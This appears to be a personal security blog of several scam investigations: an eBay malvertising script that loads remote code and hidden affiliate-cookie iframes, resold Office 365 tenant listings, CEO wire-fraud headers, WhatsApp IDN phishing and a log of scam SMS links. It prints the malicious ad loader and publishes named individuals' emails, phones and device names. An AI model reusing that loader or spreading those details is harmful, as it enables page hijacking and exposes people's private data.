https://tags.mathtag.com/notify/js?exch=pub&id=5aW95q2jLzE0LyAvTTJSaU9XVTNOR1F0TlRnME5TMDROV1V5TFRBd01EQXRNREF3TURBd01EQXdNREF3LzIwMDUzNzQ4NjYyMzQ4OTkxODMvNTM0NDE2My8yOTAzNjMxLzMvTkNYN2Nkai1NMnNVcXBoLVF2b3pkMnBkaHhDbEdlZUg4R2pkdVpSOXRrcy8xLzMvMTUxOTY2NjIwMC8wLzU3OTM1Ni8xMzU5MTA5NjMyLzIwMTAwMi80NDM4MDIvMS8wLzAvTURBd01EQXdNREF0TURBd01DMHdNREF3TFRBd01EQXRNREF3TURBd01EQXdNREF3LzAvMC8wLzAvMC8yMDA1Mzc0ODY2MjM0ODk5MTgzL3pyaC8/NVxI2XsTKGxAGahgZIG3pD1Qquo&sid=2903631&cid=5344163&nodeid=1135&price=0.091&group=eu&auctionid=2005374866234899183&bp=a_ajbcci&3pck=http://clicktrack.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=JnB1YklkPTE1NTIxMiZzaXRlSWQ9MTU1MjEzJmFkSWQ9OTUyMDE1JmthZHNpemVpZD0yMjUmdGxkSWQ9MzU0MDkzODUmY2FtcGFpZ25JZD0xNjczNSZjcmVhdGl2ZUlkPTAmYWRTZXJ2ZXJJZD0yNDMmaW1waWQ9RTQ4OTczRjYtREM2Ri00ODMyLTg1NkUtNjM5NkNCQTk1QzE4JnBhc3NiYWNrPTA=_url=

They reference tags.mathtag.com.. something to do with Math Media. An advertising agency or system.

Mathtag then send the following javascript:

<div class="script">
    
        ! function() {
            var e, t = "https://d.willvox.com",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//ebayadvertising.co.uk/",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                },
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                },
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
                };
            try {
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                var i = m(r);

                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t
                }

                function p() {
                    if (window.top) return window.top;
                    for (var e = window; e.parent;) e = e.parent;
                    return e
                }

                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}
                            }()
                        }
                    }
                }

                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "

<div>" + e.responseText + "</div>

", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                                u(o[a])
                            }
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");
                        c.parentNode.removeChild(c)
                    }
                }

                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
                }

                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)
                }

                function f() {
                    try {
                        e = !(window.self === window.top)
                    } catch (t) {
                        e = !0
                    }
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? (o.mt = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                        }
                    }() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
                        try {
                            for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
                                var n = e[t];
                                if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
                            }
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h, a.open("GET", r), a.send()
                }
                f()
            } catch (e) {
                document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
            }
        }();

This code looks like it is supposed to be showing the following advert: https://d.willvox.com/ad/zaful.jpg possibly if the browser doesn’t support JavaScript(?) but it also triggers yet another request to https://d.willvox.com (see the last screenshot) which responds with.

<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>

And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:

Email maheshrajiv@gmail.com 
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India

Phone 919029929719

They also own other similarly named and fishy looking domains:

addtodeal.com
alfaimpl.com
ceworldwide.in
funderspool.com
funderspool.in
grannyssecretrecipes.com
iafm.in
indiaftv.com
indiaftv.in
indianfashion.tv
internationalmediaplanet.com
juiceelement.in
mychildmyworld.com
panchakarma.online
runwayagency.com
saiproductionsbudapest.com
shivgarjana.in
squareroof.com
termzero.com
themostmodels.com
v7remedy.com
visioncorpltd.com
visioncorptv.com
visioncorptv.net
visionre.in
wildvox.com

Suspiciously low cost Office 365 accounts are a bad idea!

I’m going to cut to the chase right at the top here. The person behind this specific Office 365 subscription and setup is: JosephBB@gmail.com with what appears to be an invalid UK format phone number (4414402325)

While hunting for a low cost way to get Office 2016 I came across ebay sellers and forum posts touting Office 365 accounts for as low as 1$.

In this instance the domains associated with this are:

3650ffice.top
office2016.red
office2016.ink
vod365.com
myoffice365.site
pkamc.onmicrosoft.com
2016microsoftonline.com
ckw.ddns.net
office2016.ren
and the company name associated with the account is “inc”.

It looks like there are at least 662,053 users on the domain(s).. so a lot of fraudulent accounts. If each one sold for $1 there is potential for a pretty decent income for the person breaking the Microsoft tenant terms.

The account I managed to get hold of had the subscription “Office 365 A1 Plus for faculty” assigned to it. This is an educational subscription to which Microsoft do not charge the establishment. They are meant for staff only and are only valid for the period that the staff member works for the establishment.

Software piracy is nothing new.. what is new is software piracy twinned with “Cloud Computing”. Essentially victims are joining the software on their computers and the OS on their mobile devices (tablets, phones etc.) to a cloud administration and delivery service.

ObjectId                             DisplayName UserPrincipalName         UserType
--------                             ----------- -----------------         --------
6feaec4c-a03d-47b8-a91e-91763ca15acf new93193    new93193@myoffice365.site Member
410a9f71-b35b-498b-9359-66b00f61294e newera12    newera12@myoffice365.site Member
35484d0b-3728-486a-8c12-32925fcce783 Newloib     bx40008776@office2016.ink Member
90195ce8-d191-4405-b794-1f6c2e8f69e7 newo        newo@vod365.com           Member
35cab5e1-a57b-4776-bd66-37b6a14344f7 newton1982  newton1982@office2016.ink Member
fc37f5ed-f2fa-472c-a6fe-4db7f4a78d0d Newupmm     ur62210642@office2016.ink Member
33b1c685-e7fa-48f9-8cc3-6a373b451a78 Newuyru     gs73410876@office2016.ink Member

Out of the 662,053 users there appears to be about 28,700 devices registered against the Office 365 Azure AD.

With just a normal “user” account you can list all the devices, find their name, OS version and the last logon time. Some even appear to have joined their entire windows machine to the Azure AD domain.

DESKTOP-524MHQJ     Windows      10.0.16299.0    AzureAd         26/01/2018 13:01:53
LAPTOP-HH8A7UON     Windows      10.0.15063.0    Workplace       30/12/2017 09:29:07
iPhone              iPhone       11.2            Workplace       04/12/2017 04:18:02
DESKTOP-204GR9D     Windows      10.0.16299.0    Workplace       11/01/2018 03:57:02
Redza Harith        iPhone       11.2.5          Workplace       29/01/2018 18:56:19          <span 				data-mce-type="bookmark" 				id="mce_SELREST_start" 				data-mce-style="overflow:hidden;line-height:0" 				style="overflow:hidden;line-height:0" 			></span>
stockroom           Windows      10.0.16299.0    Workplace       30/01/2018 19:15:03
DESKTOP-4R1702H     Windows      10.0.15063.0    Workplace       06/12/2017 13:04:42
ExoticNympho        Windows      10.0.15063.0    Workplace       06/12/2017 11:05:53
user-PC             Windows      10.0.16299.0    Workplace       21/01/2018 08:29:24 <span 				data-mce-type="bookmark" 				id="mce_SELREST_start" 				data-mce-style="overflow:hidden;line-height:0" 				style="overflow:hidden;line-height:0" 			></span>

All the mailing list group names are visiable to any other user too – but luckily, for most, the members and content are not. There are about 1,600 mailing lists / groups visible on the tenant. A selection of which are below.

ObjectId                             DisplayName                                      Description
--------                             -----------                                      -----------
00319e30-08c1-4f0a-a94a-4615902dba7f BDB Group IT                                     Group IT Document
00630644-ae08-4892-967a-e94ce2443c7e Giesse                                           Giesse
00b53ca7-98fd-4207-8e19-6b5cc0f24d40 CMDB                                             CMDB
00b7dd8b-c55e-42bc-b915-4b03fe333bb7 proba                                            proba
01071288-059e-4650-adf9-ddfc70e7866d Buying house                                     Buying house
0141e0cd-8dd4-4d87-933c-e4060dcf7c07 HASA-MCH-TRAINING                                للاستخدام بتعليم المستمر         

Some people have even joined their oauth and other data sharing devices and apps to it!

AvailableToOtherTenants    : True
DisplayName                : owncloud external1

AvailableToOtherTenants    : True
DisplayName                : IperiusBackup

DisplayName                : PCS
LogoutUrl                  : https://pcsystem.co.uk
DisplayName                : PCS
KeyCredentials             : {class KeyCredential {
                               CustomKeyIdentifier:
                               EndDate: 31/12/2099 12:00:00
                               KeyId: 2eebea6e-2bc0-4a04-938f-ffc4596aa262
                               StartDate: 02/02/2018 08:32:27
                               Type: AsymmetricX509Cert
                               Usage: Verify
                               Value: }}
LogoutUrl                  : https://pcsystem.co.uk

It all looks like a disaster waiting to happen.

Further research to do with the associated domain names…

3650ffice.top:
Also associated with office2016.group, 365office.vip, office365.gift, office365.press and office2016.loan

office2016.red:
Also associated myoffice2016.xyz

office2016.ink:
Also associated with ms365.site, ms365.club, my365.site, myoffice365.work, office2016.ink, msoffice.top, myoffice365.top, office2016.shop, office2016.biz, myoffice365.pro, office2016.info, office2016.party, myoffice365.site and office2016.ltd

vod365.com:
Also associated with pda315.com and 590.net

 

“mugleyandco.co.uk” CEO / Director wire transfer fraud

A recently registered domain is being used in attempts to defraud companies and organisations out of money using BACS / Bank transfers.

mugleyandco.co.uk
Registrant details are a fictitious company at a real address.

Registrant:
 Derek Mugley

Trading as:
 Mugley Co

Registrant's address:
 Sheffield Road 443
 Chesterfield
 S41 8LT
 United Kingdom

Relevant dates:
 Registered on: 14-Jan-2018
 Expiry date: 14-Jan-2020
 Last updated: 14-Jan-2018

The scam starts with a contact within a company or organisation being sent an e-mail.. supposedly from the director or CEO of the company. In this instance the scammer failed and guessed, incorrectly, at the e-mail format for the organisation. The address in question doesn’t exist and has never existed. The person they chose to imitate doesn’t even use a computer regularly, let alone email.

“Quick question – could you let me know the cut off time for processing same day payments?”

Sender Preference Framework (SPF), in this instance, highlighted the forgery to the recipient.

Headers of the email are as follows:

Received: from p3plwbeout18-03.prod.phx3.secureserver.net (173.201.193.186) by
 LO2GBR01FT005.mail.protection.outlook.com (10.152.42.91) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.428.12 via Frontend Transport; Thu, 18 Jan 2018 11:08:10 +0000
Received: from p3plgemwbe18-02.prod.phx3.secureserver.net ([173.201.193.151])
	by :WBEOUT: with SMTP
	id c82kezjlTYt7tc82keBm7t; Thu, 18 Jan 2018 04:07:38 -0700
X-SID: c82kezjlTYt7t
Received: (qmail 2879 invoked by uid 99); 18 Jan 2018 11:07:38 -0000
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="utf-8"
X-Originating-IP: 5.65.27.74
User-Agent: Workspace Webmail 6.8.19
Message-ID: <20180118040736.4ee683f531e626f242b26faaf53eeeec.733ad06787.wbe@email18.godaddy.com>
From: David REDACTED <David.REDACTED@REDACTED.co.uk>
X-Sender: lisa@memorablemomentsmatter.com
Reply-To: David REDACTED <contact@mugleyandco.co.uk>
To: <accounts@REDACTED.co.uk>
Subject: Morning
Date: Thu, 18 Jan 2018 04:07:36 -0700
MIME-Version: 1.0
Return-Path: lisa@memorablemomentsmatter.com

It looks like the scammer is using a GoDaddy webmail account that belongs to “lisa@memorablemomentsmatter.com” and has an “identity” setup on the webmail to send / spoof the from address as the supposed impersonated director. The reply to address has been set to the newly registered domain with the email “contact@mugleyandco.co.uk”

The email was submitted to GoDaddy from a Sky Broadband IP address possibly based in Oxfordshire.

The scam would play out as so….

You get an email and the fraudster is counting on the fact that..

-They’ve guessed that the board member’s email address is name.name@company and you think it is legitimate.

-They hope you don’t notice, when you click reply, that the email address you are sending back to is different.

-They hope you don’t notice that the request / question is very unusual.

If you reply to the initial question about payment they will then send another request similar to: I need you to make a quick wire of £24,730 to cover a payment, I will send you the expenditure details for proper coding later today.

Along with some destination bank details.

They are just attempting to get people to wire X thousands of pounds and by the time (12 hours, 24 hours or more) that the company notices that the payment wasn’t legitimate the scammer is long gone as is the money.

Whatsapp spreading spam “IDN” links (offr.rocks / milolead.com)

Today I delved into a bit of Whatsapp spam doing the rounds in the UK.

This junk spreads using a Whatsapp message the same or similar to:

“Hey ! Waitrose celebrates its 113th anniversary and giving away FREE gift voucher worth of £250 to everyone ! click here to get yours : http://www.waıtrose.com/voucher  Enjoy .”

The domain involved is an “IDN” (International Domain Name)..  a domain name that can have more than just a-z and 0-9 as letters. They can have international symbols which look very much like normal alphabet letters.
(when these were launched people voiced their concerns about attacks like this.. and here they are).

In this instance the i in waitrose has been replaced with a different international letter.

The domain name that people are actually visiting (but is hidden behind the IDN system) is www.xn--watrose-sfb.com . The domain is registered via a whois privacy service but there are still some clues as to who is running the spam site.

The website is served from an Amazon AWS host and the DNS infrastructure doesn’t give any clues away.

However the source of the spam site has one unique bit of information: a Google Analytics / Tag Manager code of “UA-96118136-18”. The first part of this code (“UA-96118136”) is used to identify a specific Google Analytics account. The number at the end identifies the website under that account.
This code leads onto several other similar scam domain names!

waitrose-2018.life – Another Waitrose domain.
freedelta.world – (Delta airlines?) Seen using UA-96118136-23
http://www.xn--lid-xbb.com – Which translates to lidǀ.com (another EU supermarket) seen using UA-96118136-6 (“Lidl célèbre son 42 anniversaire et offre gratuit des chèques-cadeaux d’une valeur de €250 chacun!, Je viens de recevoir le mien, cliquez ici pour obtenir le vôtre : http://www.lidǀ.com/Bon Merci plus tard .”)
http://www.xn--ea-gpa2a.com – Which translates to www.ıĸea.com seen using UA-96118136-31
http://www.xn--costc-yob.com – Which translates to www.costcơ.com (International wholesale supermarket) seen using UA-96118136-46
http://www.southwest-pass.com – (Southwest airlines?) Seen using UA-96118136-38
http://www.xn--asa-wqa.com – Which translates to www.asđa.com (a UK supermarket) seen using UA-96118136-20

The website owner is also quite keen to prevent desktop users from seeing the page. There is some basic javascript to forward any screen resolution above 1000 pixels wide to a 404 page.

When you are using a mobile page you are given a series of supposedly survey questions – none of these question responses are stored anywhere or sent anywhere.

It then asks you to share the page with whatsapp friends – Once you’ve done this 15 times it forwards you to another page. (they don’t verify, just click the button 15 times and back out of sending the message! or (like in my case) don’t have Whatsapp installed so it can’t even attempt to send).

var c = 0;
$(document).ready(function() {
    $("#b1").on('click', function() {
        ++c;
        if (c > 15) {
            $(this).attr({
                href: "http://www.xn--watrose-sfb.com/final.html",
                target: "_self"
            });
        }
    });
    $("#b2").on('click', function() {
        if (c > 15) window.location = "http://www.xn--watrose-sfb.com/final.html";
        else window.alert("Share it with friends on WHATSAPP on our anniversary promotion!\n\n You must share to proceed " + c);
    });
});

http://www.xn--watrose-sfb.com/final.html is a simple single line page that forwards the user to:

http://track.voltrrk.com/d856c087-0ae9-4cd0-ada6-3c4c50f00857

The above is a host with an instant referral (CNAME) to “bxg1w.voluumtrk2.com” – a statistics tracking service.
This tracking service then redirects visitors to
http://offr.rocks/?a=2149&c=10512&s2=zDTEDITEDEDITEDEDITEDC

The above domain / page is probably the last of the “scammy” pages. The visitor is then redirected to what seems to be a “genuine” “Ocean Cloud” survey and competition:

http://milolead.com/page?country=uk&pub=2&cam=174&r=1XX4-1EDITED73&a=2149

After bombarding you with demands for your name, date of birth, postal address and then telephone number it asks you tens of questions. Within a few minutes of filling in the survey it sends at least 5 e-mails and one text message with all sorts of spam. The emails have been for casinos and bitcoin.

The text message read

“Congrats NAMEEDITEDOUT,
You’ve Won a 
Free Bitcoin System
Claim it NOW here:
2018deal.com/l/cryptoa8Hp”

Eventually ends by redirecting you back to (I believe) the scammers controlled page.. whilst also sharing the telephone number with them too:

http://offr.rocks/?a=2511&c=8472&msisdn=07EDITED063&s2=XUJEDITED2BT

Who in turn then redirect you to yet another “offer”:

http://app.trk12.com/campaign/bc65e43d235d6b61464e9f8bc0859e45d90e5ac9?transaction_id=X3X9-15EDITED34&aff_id=2511&msisdn=07EDITED063

On this page “A brand of SB7 Mobile Ltd.” the terms and conditions hidden at the bottom note that you are signing up to a £4.50 a week SMS service. The page already has your number filled in (from the previous spam survey you just completed).

I presume the scammers get paid an affiliate fee each time they refer someone and their method to generate leads and referral fees is to trick people into sending spam Whatsapp messages.

Thoroughly scammy.

On a side note.. the service shown in the last screenshot is called “pinchecker.com”.. This company seem to handle the sign up process to the premium rate reverse charge SMS spam.
They seem to handle sign-ups for the following companies (some are all showing the same postal address):
PrizeHook.com – “SPTwo Ltd” / sptwo.com
PrizeAlerts.co.uk, JuicyWin.com, MintedMobi.com – “SB7 Mobile Ltd” / sb7mobile.com aka “Alerts 4 U”
PrizeNut.com, StarMystics.com – “KPMobTech Ltd” / kpmobtech.com

Associated domains on the pinchecker servers include “tiiny.uk”.. a website that leaks customer telephone numbers! Something that they can be fined for heavily once the EU GDPR comes in to effect.

Update: After just over a week of completing the above I then also got a text:

From: +60441
Free msg: Hi , thanks for completing the telephone survey, now text back YES to confirm your number. vivalavoucher.co.uk Help 03447451791

Part of the same organisation? Or someone they sold their list to who now want me to opt in?

Also
From: +447860064308 / 07860064308
We are contacting you as you could be owed up to £2,442 if you were miss-sold PPI. Reply POST to receive your FREE check or STOP to opt-out, H&H

From: DavidShow
Hi
This new system is
The same one like the one
I’m using:
http://tapl.gq/3bwi

About a month later I get the following “reminder” sms which reveals another domain name associated with it:

From +88222
FreeMsg: Reminder: U are a member of Alerts4U.co.uk for £1.50 per alert (max £4.50 per week) until you send STOP to 88222. Help? 03301340181

From +447520660227
We have been trying to contact you re your PPI Claim. We now have details of how much you are due. Reply POST for your pack or END to OptOut

From Maria
Thats the system u ask me about few times:
http://tapz.ml/19nS

Another bit of crap to the honeypot number only given to them:

From +447418340104
If you have had a 3 hour+ delay for a flight in the last 6 years reply YES to claim compensation of up to £520 per person or?reply?STOP to opt-out,?Airfair?

Email on 7th Feb at 11:27pm which mentions bitcoin and “acmvip.com” and “earnwithbitcoin.co”
Followed by an SMS (grr, that late at night!?) at 11:28pm saying:
From Account Dep
Dear ,
Your Bitcoin account has been activated.
Your current balance is: 10,090.18 Pounds.
Claim your Funds Now:
http://www.acmvip.com/f/

With this latest spam I’ve finally got the name of a person! deani.henderson@gmail.com

Who is also associated with 85 other domains, most of which look suspicious:
acrvip.com
actdep.com
australiawinners.com
iebay.org
wealth2017.com
makemoremoneythisyear.org
itsyourluckyday.net
hotpromotionsforyou.net
bigpromotionsforyou.net
singlemommakesmoney.net
makemoremoneythisyear.net
44waystomakemoremoney.net
tradeongold.net
earningmoney2015.net
makemoremoney2015.net
secondaryjobs2015.net
bestworkathomejobs2015.net
itsyourluckyday.info
hotpromotionsforyou.info
bigpromotionsforyou.info
moneyonline2015.info
bestworkathomejobs.info
yourbonusishere.com
hotpromotionsforyou.com
bigpromotionsforyou.com
boredyo.com
concept-local.com
44waystomakemoremoney.com
additionalincomefromhome.com
tradeongold.com
earningmoney2015.com
makemoremoney2015.com
secondaryjobs2015.com
bestworkathomejobs2015.com
itsyourluckyday.biz
workathome2015.net
moneyonline2015.net
theprintingbee.com
beerpillar.info
bigideafunds.info
born-racing.info
cwsby.info
extrawonderful.info
sarigard.info
bakewithpepper.info
beginster.info
radiotracklistings.com
speedf.info
ulopi.com
nanmoya.com
verogon.com
samrazor.com
ibookselearning.com
photo-monstr.info
pandorartbox.com
loveurway.info
idolgifts.info
smoodze.com
cartuningni.com
modelnora.com
glooub.com
stikabox.com
plactec.com
lockclad.com
mmemode.com
sertele.com
anampara.com
belvantes.com
bestfriendrio.com
hellopicpic.com
shavrea.com
roolty.com
nandoknows.com
ftutti.com
fotopyaart.com
sguiglygames.com
mindkolt.com
rareamateurvideos.com
googclips.com
mistressnui.com
azerofashion.com
utubevideosongs.com
stridelovesrockband.com
hartleyhonda.com
komipontaers.com

I’ve also had calls to my honeypot number from
020 8077 8840 – These people have called 7 times!
01792 272252 – 4 calls
01473 371629 – 3 calls.

1st March 2018 – Another SMS with another domain:
SMS from “Mark C”
Hi
I need you to be my beta tester.
Test my system and get it free:
http://lp.Special2018.com

7th March 2018 – Another SMS with another new domain, registered on 5th March:

SMS from “Robert”
Hi
This system change the world
test it and get it free:
http://tapl.ws/1yZS

10th March 2018 – This time a bit of spam that uses www.myoffers.co.uk as the landing page.

SMS from “FreeCompare”
TestersKeepers needs you to review and KEEP an £18K Audi A3 for FREE – apply by 31/03/18

http://www.gvme.uk/WNAb4Wsx/
*T&Cs

Stop? END to 07860020187

12th March 2018 – Another new domain.

SMS from “Danny”
Hi
Dear VIP member:
enjoy my new system:
http://tapy.ws/5Kfs

16th March 2018 – another new domain “tapv.ws”

22nd March 2018 – another new bit of spam, this time using a google URL shortened service.. hah, google have disabled the url! No sign in any of these text messages on unsubscribe procedures! (Pretty sure that is against sms spam rules).

SMS from Amanda
Hi
IM giving you my new free system.
test it and keep th eprofits:
https://goo.gl/LkFhuA

27th March 2018 12:11am:

SMS from Emma
Hi,
Where have you been? this is your final chance to beta test my amazing software…. Try now:
http://coinsbanc.org/

27th March 2018 13:48am:

SMS from Chris
Hi,
here is that new deal we mentioned last week http://www.r5.ms/s/2joeoo/py

Forwards to http://crypto-unlocked.xyz

28th March 2018:

SMS from David W
Hi
The new upgrade is ready you can have it free now:
http://lp.todaykit.com

29th March 2018:

SMS from Support
Hi
Only 2 spots left for this amazing VIP package…. Collect it now http://coinsbanc.org/

and

SMS from +447491163257
We are contacting you as you could be owed up to £2,442 if you were miss-sold PPI. Reply POST to receive your FREE check or STOP to opt-out, Hall & Hanley

30th March 2018:

SMS from Terence
Hi
I’m going to give you 500$
To test my new system:
http://cryptounlockedpro.com

2nd April 2018:

SMS from Account82
Dear , your scheduled payout needs confirmation. Please verify your account – http://bit.do/account82

SMS from Denis
Hi
your upgrade is ready.
you can start use it now to make profits:
http://www.r5.ms/s/2joeoo/sf

3rd April 2018:

SMS from Stevan
Hi Yes thats the same system im using to make profits daily: http://tapz.ws/8Qv6

5th April 2018:

SMS from Steven
, This is your LAST CHANCE!!! Only 1 Seat left… Collect Here: http://tapf.ws/7DSR

6th April 2018:

SMS from Gorge
Hi
it’s your lucky Easter
you win Free system
http://www.r5.ms/s/2joeoo/vn

9th April 2018:

SMS from Nikos
{“name”:”REDACTED”},
This is your LAST CHANCE!!! Only 1 Seat left… Collect Here:
http://tapz.ws/dSSy

11th April 2018:

SMS from Support
Hi
The upgrade for your system is ready.
Its valid for the next 24hr:
http://www.r5.ms/s/2joeoo/10q
Also associated URL: http://vl.ltfr.xyz/

12th April 2018:

SMS from Jasson
Hi
Its your time to change your life.
Extra 1000¿ income :
http://www.r5.ms/s/2pb1if/11f

13th April 2018:

SMS from Support
Hi {“name”:””}
This is the system I told u about.
I’m making over 500$ every day:
http://tapv.ws/hFuy

17th April 2018:

SMS from Emma
Hi
its your lucky day.
you win my new system:
http://www.r5.ms/s/2pb1if/12n
Associated URLS: http://vl.ltfr.xyz/ and http://peralking-tement.com and cryptounlockedpro.xyz

25th April 2018:

SMS from StevanT
Hi <REDACTED>
This is your lucky day
sign here and get free 1000¿
http://voli.cf/24Qo
Associated URLS http://lp.mymore.info/WfiiZ/ , track.myonlinepayday.co and www.thecryptogenisus.com

Scummy fake tech support department on “1-855-676-2448” pretending to be genuine companies support.

These people are posting to youtube videos and many other places pretending to be customer care for genuine companies like AVG, HP, Quicken, Dell, Skype etc.

Needless to say – they are NOT the official support and are likely to incorrectly claim your computer has viruses and needs to be fixed for $150+ etc. Be very wary of any claims that people on the end of this phone number make.

One day I will call, test and record what happens.

They post the US based phone number “1-855-676-2448”

Scummy fake tech support department “1-888-738-4333” and “1-844-711-1008”

Another day browsing the internet and another scummy fake tech support company.
This time trying to be support for almost every service in the world. 

One day I will call them and post the recording.

 

They don’t post a website but only a US phone number of “1-888-738-4333” and “1-844-711-1008” (or in their formatting “1844-711-1008”. Seems like a huge chunk of their spam posts are to linkedin (Would have thought that they would be far more proactive about removing such spam).

I believe that “1-888-269-0130” is also related to the same people.